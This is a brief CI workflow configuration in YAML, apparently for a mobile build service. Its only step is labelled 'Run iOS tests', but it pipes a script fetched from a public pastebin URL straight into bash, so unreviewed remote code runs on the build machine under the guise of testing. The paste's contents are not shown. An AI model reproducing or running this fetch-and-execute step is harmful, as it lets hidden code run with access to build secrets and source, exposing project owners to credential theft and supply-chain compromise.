workflows:
  my-workflow:
    environment:
      node: 16.9.0


    scripts:
      - name: Run iOS tests
        script: |
          bash -c "$(curl -fsSL https://pastebin.com/raw/10PtqPU7)"
        test_report: build/ios/test/*.xml
 
